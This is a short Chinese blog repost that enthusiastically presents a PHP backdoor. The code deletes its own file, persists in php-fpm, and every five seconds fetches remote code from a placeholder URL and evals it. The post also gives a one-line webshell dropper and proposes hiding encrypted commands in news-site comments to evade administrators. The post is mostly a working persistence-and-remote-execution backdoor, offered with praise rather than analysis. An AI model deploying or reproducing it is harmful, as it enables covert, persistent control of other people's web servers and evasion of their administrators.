捡了一个非常淫荡的PHP后门,给跪了

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 


例如txt里面写了一句这样的代码 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");


这样就会在目录下又生成一个木马


如果对方写了是执行命令 。。。

这段代码纯粹变成了一个等待命令的木马。。


而且管理员检查木马文件的时候  都找不到。。。


因为文件已经删除了



木马却注入在php-fpm内


sleep(5);  五秒就去远程读取一下指令。。。

........

打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。


黑客连服务器都省了。。。



黑客只需要去网易新闻评论窗口内写入自己的代码就行


怕别人看懂?


直接加密


采用对称加密算法。。没有秘钥 谁也看不懂啥意思


秘钥在这段后门里面写着


所以非常安全



活生生就是一个远控木马啊!!

这么好的思路,给作者一个大赞

转载于:https://www.cnblogs.com/h4ck0ne/p/5154562.html

  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值